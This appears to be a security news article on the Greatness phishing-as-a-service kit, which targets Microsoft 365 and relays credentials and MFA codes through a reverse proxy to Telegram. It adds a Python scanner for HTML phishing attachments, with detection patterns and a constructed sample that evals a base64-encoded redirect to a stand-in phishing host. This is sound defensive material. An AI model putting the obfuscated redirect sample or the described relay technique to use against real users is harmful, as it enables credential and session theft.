Cybercriminals have been using a phishing-as-a-service (PhaaS or PaaS) platform named Greatness to target business users of Microsoft's 365 cloud service since at least mid-2022. The platform significantly lowers the skill needed to run a phishing campaign, putting convincing attacks within reach of a wider range of attackers. Cisco Talos researcher Tiago Pereira reports that Greatness focuses almost exclusively on Microsoft 365 phishing pages and offers affiliates an attachment and link builder for creating highly convincing decoy and login pages. These pages pre-fill the victim's email address and display the company logo and background image pulled from the target organization's genuine Microsoft 365 login page. Manufacturing, healthcare, and technology entities in the U.S., the U.K., Australia, South Africa, and Canada have been the main targets of Greatness campaigns, with surges in activity detected in December 2022 and March 2023.
Phishing kits like Greatness provide threat actors, regardless of their level of expertise, with a cost-effective and scalable solution for designing convincing login pages associated with various online services. These kits can also bypass two-factor authentication (2FA) protections. The decoy pages, which appear authentic, function as reverse proxies to harvest credentials and time-based one-time passwords (TOTPs) entered by victims. Typically, the attack begins with malicious emails containing HTML attachments. Upon opening the attachment, obfuscated JavaScript code is executed, redirecting the user to a landing page. This landing page is personalized with the recipient's email address already filled in and prompts the user to enter their password and MFA (multi-factor authentication) code. The entered credentials and tokens are then sent to the affiliate's Telegram channel, enabling unauthorized access to the compromised accounts.
The adversary-in-the-middle (AiTM) phishing kit also includes an administration panel, enabling affiliates to configure the Telegram bot, keep track of stolen information, and create booby-trapped attachments or links. Each affiliate must hold a valid API key to load the phishing page; the key also serves as a gate against unwanted IP addresses and enables covert communication with the actual Microsoft 365 login page while posing as the victim. Working together, the phishing kit and the API carry out a 'man-in-the-middle' attack in which information is extracted from the victim and immediately submitted to the legitimate login page in real time. This lets the PaaS affiliate capture usernames, passwords, and authenticated session cookies, even when the victim is using MFA.
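The delivery stage described above, an HTML attachment whose obfuscated script redirects the reader to the landing page, is a natural triage point at the mail gateway. The following is an added example of a heuristic scanner for that stage, not code from Talos or from the Greatness kit; the indicator set, thresholds and constructed sample attachments are this example's own assumptions.

```python
import base64
import re
from html.parser import HTMLParser
# The indicator set, regexes and two-of-three rule are this example's own triage choices, not Talos detection logic.
DECODER_CALLS = ("atob", "unescape", "fromCharCode", "eval", "Function")
REDIRECT_RE = re.compile(r"(?:window|document)\.location|location\.(?:href|replace|assign)")
ATOB_LITERAL_RE = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")

class _ScriptExtractor(HTMLParser):
    """Collect <script> bodies and count the characters a reader would actually see."""
    def __init__(self):
        super().__init__()
        self.scripts, self.visible_chars, self._in_script = [], 0, False
    def handle_starttag(self, tag, attrs):
        self._in_script = tag.lower() == "script"
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag.lower() != "script"
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)
        else:
            self.visible_chars += len(data.strip())

def analyze_html_attachment(html):
    """Return indicator flags for one HTML attachment body (a str)."""
    parser = _ScriptExtractor()
    parser.feed(html)
    script = "".join(parser.scripts)
    decoded = ""  # one layer of base64 peeled so a redirect inside atob("...") is visible
    for blob in ATOB_LITERAL_RE.findall(script):
        try:
            decoded += base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            pass
    return {
        "has_script": bool(script.strip()),
        "decoder_calls": [c for c in DECODER_CALLS if re.search(rf"\b{c}\s*\(", script)],
        "redirect": bool(REDIRECT_RE.search(script + decoded)),
        "script_only": bool(script.strip()) and parser.visible_chars < 20,
    }

def is_suspicious(html):
    """True when the attachment runs script and shows at least two of the three indicators."""
    f = analyze_html_attachment(html)
    return f["has_script"] and sum([bool(f["decoder_calls"]), f["redirect"], f["script_only"]]) >= 2

# Constructed samples (not real artifacts): a plain report, and a script-only page that decodes and runs a redirect.
BENIGN_ATTACHMENT = "<html><body><h1>Quarterly report</h1><p>Figures are in the table below.</p></body></html>"
_payload = base64.b64encode(b"window.location.replace('https://phish.invalid/login?u=' + u)").decode()
SUSPICIOUS_ATTACHMENT = f'<html><body><script>var u="user@example.com";eval(atob("{_payload}"));</script></body></html>'
```

Only one decoding layer is peeled, so a gateway rule built on this should treat a decoder call with no visible content as worth quarantining on its own rather than waiting for the redirect to surface.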
These findings coincide with Microsoft's efforts to strengthen 2FA and counter prompt-bombing attacks: as of May 8, 2023, Microsoft has implemented number matching in Microsoft Authenticator push notifications.